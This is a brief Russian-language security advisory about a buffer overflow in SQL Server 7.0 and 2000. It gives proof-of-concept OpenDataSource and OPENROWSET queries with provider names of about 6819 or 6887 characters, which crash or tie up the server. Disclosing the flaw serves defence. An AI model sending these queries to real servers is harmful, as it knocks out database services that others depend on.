Одна из особенностей Structured Query Language (SQL) в SQL Server 7.0 и 2000 - способность соединяться с удаленными источниками данных,
подключаться к ним можно просто указывая
имя базы (OLE DB) в запросе. Если серверу в
качестве имени передать длинную строку
символов, произойдет переполнение буфера и
как следствие - полная занятость сервера
и невозможность обслуживать запросы.
Пример:
SQL Server 7
SELECT * FROM OpenDataSource( 'XXXXXXXXXXX...' -> 6819
символов или больше ...
SELECT * FROM OPENROWSET( 'XXXXXXXXXXX...' -> 6819 символов или
больше ,'', '')
SQL Server 2000
SELECT * FROM OpenDataSource( 'XXXXXXXXXXX...' ---> 6887
...
SELECT * FROM OPENROWSET( 'XXXXXXXXXXX...' ---> 6887 ...